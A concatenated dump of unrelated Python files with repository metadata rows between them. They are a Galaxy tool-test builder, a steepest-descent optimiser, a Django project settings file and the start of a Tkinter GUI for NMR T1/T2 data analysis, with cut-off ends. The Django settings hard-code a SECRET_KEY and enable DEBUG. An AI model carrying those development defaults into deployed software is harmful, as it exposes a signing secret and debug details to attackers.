print(traceback.format_exc())
return f | [
"wli21@ncsu.edu"
] | wli21@ncsu.edu |
e8f6627e5ca6c6c236f176ab86c0fa1405ddd68d | 691d3f3e04d354e11772335064f33245e1ed8c28 | /lib/galaxy/tools/test.py | ec7c7c7d1a8913c9ba7ecbcc555ce0d7d27eba56 | [
"CC-BY-2.5",
"MIT"
] | permissive | dbcls/dbcls-galaxy | 934a27cc13663549d5208158fc0b2821609399a8 | 6142165ef27f6a02aee42f26e0b94fed67ecc896 | refs/heads/master | 2016-09-05T22:53:27.553419 | 2009-09-09T06:35:28 | 2009-09-09T06:35:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,997 | py | import new, sys
import galaxy.util
import parameters
from parameters import basic
from parameters import grouping
from elementtree.ElementTree import XML
class ToolTestBuilder( object ):
"""
Encapsulates information about a tool test, and allows creation of a
dynamic TestCase class (the unittest framework is very class oriented,
doing dynamic tests in this was allows better integration)
"""
def __init__( self, tool, name ):
self.tool = tool
self.name = name
self.required_files = []
self.inputs = []
self.outputs = []
self.error = False
self.exception = None
def add_param( self, name, value, extra ):
try:
if name not in self.tool.inputs:
for input_name, input_value in self.tool.inputs.items():
if isinstance( input_value, grouping.Conditional ) or isinstance( input_value, grouping.Repeat ):
self.__expand_grouping_for_data_input(name, value, extra, input_name, input_value)
elif isinstance( self.tool.inputs[name], parameters.DataToolParameter ):
self.required_files.append( ( value, extra ) )
except: pass
self.inputs.append( ( name, value, extra ) )
def add_output( self, name, file ):
self.outputs.append( ( name, file ) )
def __expand_grouping_for_data_input( self, name, value, extra, grouping_name, grouping_value ):
# Currently handles grouping.Conditional and grouping.Repeat
if isinstance( grouping_value, grouping.Conditional ):
if name != grouping_value.test_param.name:
for case in grouping_value.cases:
for case_input_name, case_input_value in case.inputs.items():
if case_input_name == name and isinstance( case_input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
elif isinstance( case_input_value, grouping.Conditional ):
self.__expand_grouping_for_data_input(name, value, extra, case_input_name, case_input_value)
elif isinstance( grouping_value, grouping.Repeat ):
# FIXME: grouping.Repeat can only handle 1 repeat param element since the param name
# is something like "input2" and the expanded page display is something like "queries_0|input2".
# The problem is that the only param name on the page is "input2", and adding more test input params
# with the same name ( "input2" ) is not yet supported in our test code ( the lat one added is the only
# one used ).
for input_name, input_value in grouping_value.inputs.items():
if input_name == name and isinstance( input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
| [
"h-morita@esm.co.jp"
] | h-morita@esm.co.jp |
835ae6671986312e9febcc5c4269d9c60e34366d | 32cba9d6b0cb420e13a2a26c9e8c3d07e2c127b6 | /附录A 梯度下降法/最速下降法(原生Python+scipy导数计算实现).py | cee687d26b7245cfa1b086e591ae59819bbce477 | [] | no_license | wanglg007/Lihang-Statistical-learning-methods-Code | bed22551a2883b40e93340d3f96cf2fcf9e19ef2 | 190d16310be154282550e1f55eaadd8c4dd83263 | refs/heads/main | 2023-07-03T17:00:35.809206 | 2021-08-02T08:37:33 | 2021-08-02T08:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | from scipy.misc import derivative
def partial_derivative(func, arr, dx=1e-6):
"""计算n元函数在某点各个自变量的梯度向量(偏导数列表)
:param func: [function] n元函数
:param arr: [list/tuple] 目标点的自变量坐标
:param dx: [int/float] 计算时x的增量
:return: [list] 偏导数
"""
n_features = len(arr)
ans = []
for i in range(n_features):
def f(x):
arr2 = list(arr)
arr2[i] = x
return func(arr2)
ans.append(derivative(f, arr[i], dx=dx))
return ans
def golden_section_for_line_search(func, a0, b0, epsilon):
"""一维搜索极小值点(黄金分割法)
:param func: [function] 一元函数
:param a0: [int/float] 目标区域左侧边界
:param b0: [int/float] 目标区域右侧边界
:param epsilon: [int/float] 精度
"""
a1, b1 = a0 + 0.382 * (b0 - a0), b0 - 0.382 * (b0 - a0)
fa, fb = func(a1), func(b1)
while b1 - a1 > epsilon:
if fa <= fb:
b0, b1, fb = b1, a1, fa
a1 = a0 + 0.382 * (b0 - a0)
fa = func(a1)
else:
a0, a1, fa = a1, b1, fb
b1 = b0 - 0.382 * (b0 - a0)
fb = func(b1)
return (a1 + b1) / 2
def steepest_descent(func, n_features, epsilon, distance=3, maximum=1000):
"""梯度下降法
:param func: [function] n元目标函数
:param n_features: [int] 目标函数元数
:param epsilon: [int/float] 学习精度
:param distance: [int/float] 每次一维搜索的长度范围(distance倍梯度的模)
:param maximum: [int] 最大学习次数
:return: [list] 结果点坐标
"""
x0 = [0] * n_features # 取自变量初值
y0 = func(x0) # 计算函数值
for _ in range(maximum):
nabla = partial_derivative(func, x0) # 计算梯度
# 当梯度的模长小于精度要求时,停止迭代
if pow(sum([nabla[i] ** 2 for i in range(n_features)]), 0.5) < epsilon:
return x0
def f(x):
"""梯度方向的一维函数"""
x2 = [x0[i] - x * nabla[i] for i in range(n_features)]
return func(x2)
lk = golden_section_for_line_search(f, 0, distance, epsilon=1e-6) # 一维搜索寻找驻点
x1 = [x0[i] - lk * nabla[i] for i in range(n_features)] # 迭代自变量
y1 = func(x1) # 计算函数值
if abs(y1 - y0) < epsilon: # 如果当前变化量小于学习精度,则结束学习
return x1
x0, y0 = x1, y1
if __name__ == "__main__":
# [0]
print(steepest_descent(lambda x: x[0] ** 2, 1, epsilon=1e-6))
# [-2.9999999999635865, -3.999999999951452]
print(steepest_descent(lambda x: ((x[0] + 3) ** 2 + (x[1] + 4) ** 2) / 2, 2, epsilon=1e-6))
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
3da220abe75276076ddd8974828a018d7b3360a5 | 0e1642c805231cd1baca8b8cc33ef413e5196a52 | /webpersonal/settings.py | cb6f8a74000322a7440d34c44aa7b063ca96be81 | [] | no_license | Maz191099/WebPersonal | d90e2875ba38af1b6797c9f5ad13f267c7047d7b | 1a06ad539d825fc2d975a1582f02ed5b9332b4bd | refs/heads/master | 2022-07-13T15:27:55.529652 | 2020-05-14T03:29:29 | 2020-05-14T03:29:29 | 263,482,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,234 | py | """
Django settings for webpersonal project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'x3u2k+c37ir#eykfemn7duu%z6#(o5^j^9gt#@e+3=_xuj)58k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'portfolio.apps.PortfolioConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webpersonal.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webpersonal.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# Media files
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
| [
"maz191099@gmail.com"
] | maz191099@gmail.com |
447262b57cdd1f1dfb6ac8474cbf7c1ad24cf23d | c2400a1efe03aa816f742e2ca9ccb4bc9e815286 | /nmr_gui_v0.2.py | 790aa8c5d4bf1deaf79f973c114058139816080e | [] | no_license | jnejc/nmr_gui | 484fb66b21355044d32378c951a9c41030f0aa8f | 58c5cf94e50f30a92fec9165d4268db6656c61bd | refs/heads/main | 2023-08-20T21:55:28.157162 | 2021-10-26T14:19:44 | 2021-10-26T14:19:44 | 421,452,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203,061 | py | #######################################
# Gui program for analyzing nmr data (from 7NMR)
# created by Nejc Jansa
# nejc.jansa@ijs.si
# document creation 14.11.2016
# last version: 06.11.2018
#######################################
# Beta version (0.2)
# Memory leak not adressed, have to restart between long datasets to prevent freezing and loss of data!
# Works with analysis_v2.py
# Ideas for next version:
# Should split up code in several files for clarity
# Allow moving of files into diffent trace (for patching up bad sets)
# Marking of traces that are interesting, renaming, hiding Bad files...
# Find memory leak in tkinter/matplotlib
# Test direct execution or even transforming into .exe?
# Clear up dead buttons
# Prevent multiple plot instances from opening
# Better keyboard control
# More consistency with class naming and functions/methods
# A way of combining datasets, management of the raw data files
# Plotting specra angle dependence
# More controll over analysis parameters, make editable tables for it
# a D1 plot
# Implement parameters for smaller figure sizes to account for smaller resolution!!
# External input of new fitting formulas
# Simplify adding a sum of fits
# Remember selected fit function for each trace
# Better export format for fit results
# Select what is exported/ displayed/ plotted
# do not auto fit when opening old data (or remember the old fit function)
# add manual change of SHL and phase in T1, T2
# fix the export temperatures not matching file names (due to decimals)
# Versions of packages:
# numpy-1.11.2+mkl-cp35-cp35m-win_amd64.whl
# scipy-0.18.1-cp35-cp35m-win_amd64.whl
# matplotlib-2.0.0-cp35-cp35m-win_amd64.whl
# necessary imports
import numpy as np # for mathematic functions
import matplotlib # for plotting
import csv # for importing and exporting csv files
import gc
### now using matplotlib 2.0.0
import matplotlib.pyplot as plt
matplotlib.use('TkAgg') # sets tkinter to be the backend of matplotlib
#matplotlib canvas and plot edit toolbar
#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# implement the default mpl key bindings
from matplotlib.backend_bases import key_press_handler
#scipy fitting function
from scipy.optimize import curve_fit
# (Tkinter for Python 3) gui objects
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
#import analysis functions and classes
from analysis_v2 import *
#colorbrewer nice plot colot set
colors = ['#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999',
'#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999',
'#e41a1c','#377eb8','#4daf4a','#984ea3','#ff7f00','#ffff33','#a65628','#f781bf','#999999']
#set some global settings for plots
plot_font = {'family': 'Calibri', 'size': '12'}
matplotlib.rc('font', **plot_font) # make the font settings global for all plots
### global data
#make sure things that are going to change in future and might be used in multiple places are here!
GLOBAL_experiment_dirs = ['pkl', 'raw', 'csv']
GLOBAL_t1_default_params = {'mean_range':(-4,None), 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_t2_default_params = {'mean_range':(0,4), 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_t1_displayed_params = ['T1', 'r', 'analysed', 'disabled', 'mirroring', 'fr', 'temp_set', 'mean_shl',
'mean_phase_deg', 'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'TAU', 'D1', 'D3', 'D9', 'NS', 'D5_min']
GLOBAL_t2_displayed_params = ['T2', 'r', 'analysed', 'disabled', 'mirroring', 'fr', 'temp_set', 'mean_shl',
'mean_phase_deg', 'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'D1', 'D3', 'D9', 'NS']
GLOBAL_spc_default_params = {'shl_start':220, 'offset':(1500,None),
'integral_range':(2000,2100), 'mirroring':False}
GLOBAL_spc_displayed_params = ['fr', 'broaden_width', 'fr_density', 'analysed', 'disabled', 'mirroring', 'temp_set', 'mean_shl',
'mean_range', 'offset_range', 'integral_range',
'file_key', 'file_dir', 'TAU', 'D1', 'D3', 'D9', 'NS']
class Frame_experiments(tk.Frame):
'''Leftmost frame with selection of experiment'''
def __init__(self, parent):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='y')
#reference to parent
self.parent = parent
#load widgets
self.Widgets()
def Widgets(self):
'''Puts all the widgets on the frame'''
#adds label to frame
self.label_experiments = tk.Label(self, text='Experiments')
self.label_experiments.pack(side='top')
#adds list to frame
self.listbox_experiments = tk.Listbox(self, exportselection=0, bd=5,
relief='flat', height=15)
self.listbox_experiments.pack(side='top',fill='y')
self.listbox_experiments.bind('<Return>', self.Open)
self.listbox_experiments.bind('<F5>', self.New)
#checks for all experiments
for experiment in sorted(self.parent.data):
self.listbox_experiments.insert('end', experiment)
self.listbox_experiments.focus()
#adds button to frame
self.button_open = ttk.Button(self, text='Open', command=self.Open)
self.button_open.pack(side='top')
self.button_new = ttk.Button(self, text='New', command=self.New)
self.button_new.pack(side='top')
def New(self, event=None):
'''Actions to perform when button_new is pressed'''
#define button functions
def Create(event=None):
'''Create action, creates new experiment_data'''
try:
new_name = self.entry_new.get()
path = os.path.join('data', new_name)
os.mkdir(path)
for sub_dir in GLOBAL_experiment_dirs:
os.mkdir(os.path.join(path, sub_dir))
#adds an entry to listbox
self.listbox_experiments.insert('end', new_name)
#creates the Experiment_data
self.parent.data[new_name] = Experiment_data(new_name)
#asks for folder
dir_new = tk.filedialog.askdirectory(parent=root,initialdir="/",title='Please select a directory')
self.parent.data[new_name].raw_dir = dir_new
self.parent.data[new_name].Add_series()
self.parent.data[new_name].Pkl_save()
except FileExistsError:
tk.messagebox.showerror('Error','The directory already exists!')
#forgets and removes the button and entry field
Cancel()
def Cancel(event=None):
'''Cancel button action, removes the entry boxes'''
self.frame_new.destroy()
#reenables the buttons
self.button_new.config(state='normal')
self.button_open.config(state='normal')
self.listbox_experiments.bind('<Return>', self.Open)
self.listbox_experiments.bind('<F5>', self.New)
#focus back to experiments listbox
self.listbox_experiments.focus()
#build the addon frame under experiments
self.frame_new = tk.Frame(self)
#add label
self.label_new = tk.Label(self.frame_new, text='New experiment', bd=5)
self.label_new.pack(side='top')
#add entry box and set it to focus
self.entry_new = ttk.Entry(self.frame_new, takefocus=True)
self.entry_new.pack(side='top')
self.entry_new.focus()
#define enter and ecape commands within entry box
self.entry_new.bind('<Return>', Create)
self.entry_new.bind('<Escape>', Cancel)
#add create button
self.button_create = ttk.Button(self.frame_new, text='Create', command=Create)
self.button_create.pack(side='top')
#add cancel creation button
self.button_cancel = ttk.Button(self.frame_new, text='Cancel', command=Cancel)
self.button_cancel.pack(side='top')
#disable the upper buttons to prevent multiple entry boxes
self.button_new.config(state='disabled')
self.button_open.config(state='disabled')
self.listbox_experiments.unbind('<Return>')
self.listbox_experiments.unbind('<F5>')
#pack the holding frame
self.frame_new.pack(side='top')
def Open(self, event=None):
'''Opens selected experiment and shows available series'''
#define button functions
def Select(event=None):
'''Opens the traces of the selected series, loads them into listbox'''
#get the selected series
self.parent.current_series = self.listbox_series.get('active')
#call traces frame functions
self.parent.traces.Load_series()
def Refresh(event=None):
'''Updates raw_file_list by scanning directories again'''
self.parent.data[self.parent.current_experiment].Find_raw_files()
for serie in self.parent.data[self.parent.current_experiment].series:
self.parent.data[self.parent.current_experiment].series[serie].Keys()
msg = 'The file directory was scanned and the file lists updated!'
tk.messagebox.showinfo('File list updated', msg)
def Save(event=None):
'''Save and close the current experiment'''
self.frame_series.destroy()
#reenables the buttons
self.button_new.config(state='normal')
self.button_open.config(state='normal')
self.listbox_experiments.config(state='normal')
self.listbox_experiments.bind('<Return>', self.Open)
self.listbox_experiments.bind('<F5>', self.New)
#focus back to experiments listbox
self.listbox_experiments.focus()
#pickle all the containing data
self.parent.data[self.parent.current_experiment].Pkl_save()
#close up other frames
self.parent.traces.Disable()
self.parent.temperatures.Disable()
#remembers what experiment we are working on and loads it
self.parent.current_experiment = self.listbox_experiments.get('active')
if not self.parent.data[self.parent.current_experiment].opened:
self.parent.data[self.parent.current_experiment].Pkl_load()
self.parent.data[self.parent.current_experiment].opened = True
#disable the upper buttons to prevent multiple frames
self.button_new.config(state='disabled')
self.button_open.config(state='disabled')
self.listbox_experiments.config(state='disabled')
self.listbox_experiments.unbind('<Return>')
self.listbox_experiments.unbind('<F5>')
#makes new frame for popup series
self.frame_series = tk.Frame(self)
#button to close and save series section
self.button_save = ttk.Button(self.frame_series, text='Save & Close', command=Save)
self.button_save.pack(side='top')
#button to update file lists
self.button_refresh = ttk.Button(self.frame_series, text='Refresh files', command=Refresh)
self.button_refresh.pack(side='top')
#add label
self.label_series = tk.Label(self.frame_series, text='Series', bd=5)
self.label_series.pack(side='top')
#add listbox
self.listbox_series = tk.Listbox(self.frame_series, exportselection=0, bd=5, relief='flat')
self.listbox_series.pack(side='top', fill='y')
self.listbox_series.bind('<Return>', Select)
#fill listbox
for series in sorted(self.parent.data[self.parent.current_experiment].series):
self.listbox_series.insert('end', series)
self.listbox_series.focus()
#add buttons
self.button_select = ttk.Button(self.frame_series, text='Select', command=Select)
self.button_select.pack(side='top')
#pack popdown frame
self.frame_series.pack(side='top')
class Frame_traces(tk.Frame):
'''The frame for selecting traces and fits to display on plot'''
def __init__(self, parent):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='y')
#reference to parent
self.parent = parent
#load widgets
self.Widgets()
#flag to keep track if frame is already in use
self.enabled = False
def Widgets(self):
'''Puts all the widgets on the frame'''
#add label
self.label_traces = tk.Label(self, text='Traces', state='disabled')
self.label_traces.pack(side='top')
#add listbox
self.listbox_traces = tk.Listbox(self, exportselection=0, bd=5, height=30,
relief='flat', state='disabled')
self.listbox_traces.pack(side='top',fill='y')
self.listbox_traces.bind('<Return>', self.Edit)
#adds button to frame
self.button_show = ttk.Button(self, text='Edit', command=self.Edit, state='disabled')
self.button_show.pack(side='top')
self.button_delete = ttk.Button(self, text='Plot', command=self.Plot,
state='disabled')
self.button_delete.pack(side='top')
self.button_new = ttk.Button(self, text='New', command=self.New, state='disabled')
self.button_new.pack(side='top')
def Enable(self):
'''Enables the items in the frame'''
if not self.enabled:
for child in self.winfo_children():
child.config(state='normal')
self.enabled = True
def Disable(self):
'''Disables all items in the frame'''
if self.enabled:
for child in self.winfo_children():
child.config(state='disabled')
self.enabled = False
def Load_series(self):
'''Actions on selection of a series'''
self.Enable()
self.Clear()
for key in sorted(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].keys):
self.listbox_traces.insert('end', key)
self.listbox_traces.focus()
def Clear(self):
'''Cleanup actions to do when another series is opened, or experiment is closed'''
self.listbox_traces.delete(0, 'end')
def Edit(self, event=None):
'''Displayes the temperature tab of the trace and allows analysis'''
self.parent.current_trace = self.listbox_traces.get('active')
self.parent.temperatures.Load_trace()
def Plot(self):
'''Opens a frame with T1vT plot ...'''
#disable Temperatures frame
self.parent.temperatures.Disable()
#disable interfering buttons
self.button_show.config(state='disabled')
#save selected trace
self.parent.current_trace = self.listbox_traces.get('active')
#T1 analysis
if self.parent.current_series == "T1vT":
## try:
## if self.parent.plot_t1_t1vt.counter > 0:
## self.parent.plot_t1_t1vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
## except:
self.parent.plot_t1_t1vt = Frame_plot_T1_t1vt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
self.parent.plot_t1_t1vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
elif self.parent.current_series == "T2vT":
self.parent.plot_t2_t2vt = Frame_plot_T2_t2vt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
self.parent.plot_t2_t2vt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
elif self.parent.current_series == "Spectrum":
self.parent.plot_spc_frvt = Frame_plot_spc_frvt(self.parent, self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
self.parent.plot_spc_frvt.Add_trace(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace])
def New(self):
Error_incomplete()
plt.figure(figsize=(8,6))
plt.plot([1,2,3,4,5,6,7], color=colors[1])
plt.title("Fids")
plt.xlabel("t (index)")
plt.ylabel("signal")
plt.grid()
#print the plot
plt.show()
def Edit_set(self):
'''Changes to single selection in the trace listbox and enabled edit button'''
Error_incomplete()
def Plot_set(self):
'''Changes to multiple selection to allow plotting of several traces'''
Error_incomplete()
class Frame_temperatures(tk.Frame):
'''The frame for selecting traces and fits to display on plot'''
def __init__(self, parent):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill ='y')
#reference to parent
self.parent = parent
#load widgets
self.Widgets()
#flag to keep track if frame is already in use
self.enabled = False
self.wait = tk.BooleanVar(master=self, value=False)
#memory of selected params
self.previous_t1 = GLOBAL_t1_default_params
self.previous_t2 = GLOBAL_t2_default_params
self.previous_spc = GLOBAL_spc_default_params
def Analyze_fid(self, trace):
'''gets the (T1) trace class and runs the analysis and plotting functions'''
#T1 analysis
if self.parent.current_series == "T1vT":
if trace.analysed:
#skip to reviewing
self.parent.plot_t1_view = Frame_plot_T1_view(self.parent, trace)
self.wait.set(False)
else:
#run analysis
self.parent.plot_t1_quick = Frame_plot_T1_quick(self.parent, trace)
elif self.parent.current_series == "T2vT":
if trace.analysed:
#skip to reviewing
self.parent.plot_t2_view = Frame_plot_T2_view(self.parent, trace)
self.wait.set(False)
else:
#run analysis
self.parent.plot_t2_quick = Frame_plot_T2_quick(self.parent, trace)
elif self.parent.current_series == "Spectrum":
if trace.analysed:
#skip to reviewing
self.parent.plot_spc_view = Frame_plot_spc_view(self.parent, trace)
self.wait.set(False)
else:
#run analysis
self.parent.plot_spc_quick = Frame_plot_spc_quick(self.parent, trace)
else:
Error_incomplete()
self.parent.temperatures.wait.set(False)
self.button_show.config(state='normal')
self.parent.traces.button_show.config(state='normal')
#refresh the temperatures tab
self.parent.temperatures.Load_trace()
def Widgets(self):
'''Puts all the widgets on the frame'''
#button functions
def Show(action=None):
'''Opens analysis window for selected temperatures'''
#disable buttons that could interrupt loop
self.button_show.config(state='disabled')
self.parent.traces.button_show.config(state='disabled')
#run analysis loop
for select in self.listbox_temperatures.curselection():
temp = self.listbox_temperatures.get(select)
self.wait.set(True)
self.Analyze_fid(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp])
#wait untill the analysis is finished before continuing the loop!
root.wait_variable(self.wait)
#reenable buttons
self.button_show.config(state='normal')
self.parent.traces.button_show.config(state='normal')
#refresh the temperatures tab
self.parent.temperatures.Load_trace()
def Delete():
'''Deletes the reference to the selected temperatures'''
#loop over selected files
for select in self.listbox_temperatures.curselection():
temp = self.listbox_temperatures.get(select)
self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace].pop(temp, None)
#refresh list
self.Load_trace()
def Deselect(action=None):
'''Deselects the active entries in listbox'''
self.listbox_temperatures.selection_clear(0,'end')
#add label
self.label_temperatures = tk.Label(self, text='Temperatures', state='disabled')
self.label_temperatures.pack(side='top')
#listbox frame
self.frame_listbox = tk.Frame(self)
self.frame_listbox.pack(side='top', fill='y')
#add listbox
self.listbox_temperatures = tk.Listbox(self.frame_listbox, selectmode='extended', exportselection=0,
bd=5, relief='flat', state='disabled', height=30)
self.listbox_temperatures.pack(side='left',fill='y')
#keybinds for listbox
self.listbox_temperatures.bind('<Return>', Show)
self.listbox_temperatures.bind('<Escape>', Deselect)
#add scrollbar
self.scrollbar_listbox = ttk.Scrollbar(self.frame_listbox, orient='vertical')
self.scrollbar_listbox.config(command=self.listbox_temperatures.yview)
self.scrollbar_listbox.pack(side='right',fill='y')
self.listbox_temperatures.config(yscrollcommand=self.scrollbar_listbox.set)
#adds button to frame
self.button_show = ttk.Button(self, text='Show', command=Show, state='disabled')
self.button_show.pack(side='top')
self.button_deselect = ttk.Button(self, text='Deselect', command=Deselect,
state='disabled')
self.button_deselect.pack(side='top')
self.button_delete = ttk.Button(self, text='Delete', command=Delete, state='disabled')
self.button_delete.pack(side='top')
def Enable(self):
'''Enables the items in the frame'''
if not self.enabled:
for child in self.winfo_children():
try:
child.config(state='normal')
except: pass
self.listbox_temperatures.config(state='normal')
self.enabled = True
def Disable(self):
'''disables the items in the frame'''
if self.enabled:
for child in self.winfo_children():
try:
child.config(state='disabled')
except: pass
self.listbox_temperatures.config(state='disabled')
self.enabled = False
def Load_trace(self):
'''Actions on selection of editing a trace'''
if self.enabled:
self.Clear()
elif not self.enabled:
self.Enable()
self.Clear()
for temp in sorted(self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace]):
self.listbox_temperatures.insert('end', temp)
self.listbox_temperatures.focus()
for i, temp in enumerate(self.listbox_temperatures.get(0, 'end')):
if self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp].analysed:
self.listbox_temperatures.itemconfig(i, bg='pale green',
selectbackground='dark green')
#try:
if self.parent.data[self.parent.current_experiment].series[self.parent.current_series].traces[self.parent.current_trace][temp].disabled:
self.listbox_temperatures.itemconfig(i, bg='light salmon',
selectbackground='red')
#except: pass
def Clear(self):
'''Cleanup actions to do when another temp is opened, or experiment is closed'''
self.listbox_temperatures.delete(0, 'end')
class Frame_plot_T1_quick(tk.Frame):
'''Pioneer first T1 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#starting data
self.range = self.parent.temperatures.previous_t1['mean_range'][0]
#load widgets
self.Widgets()
#run quick t1
quick_tables = trace.Quick_T1()
self.Fill_plots(*quick_tables)
#take focus away from listbox
self.focus()
#global key binds
root.bind('<Left>', self.Interrupt)
root.bind('<Right>', self.Finish)
def Finish(self, event=None):
'''Accepts the data on this screen and closes it up'''
#save data
self.trace.mean_range = (self.range, None)
self.trace.mean_shl = int(self.mean_shl)
self.trace.mean_phase = self.mean_phase
self.parent.temperatures.previous_t1['mean_range']=(min(self.range,19), None)
#hide this frame
self.pack_forget()
#close plots
plt.close('all')
#forget global key bind
root.unbind('<Right>')
root.unbind('<Left>')
#run next frame
self.parent.plot_t1_ranges = Frame_plot_T1_ranges(self.parent, self.trace)
def Interrupt(self, event=None):
'''Stops the analysis loop'''
#Destroy frame and plots
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#stop the analysis loop
self.parent.temperatures.wait.set(False)
def Widgets(self):
'''Builds all the subframes and canvases'''
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,3))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.14, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4))
self.fig_left2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#interrupt button
self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
self.button_interrupt.pack(side='left', anchor='w')
#label and edit of mean_range
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
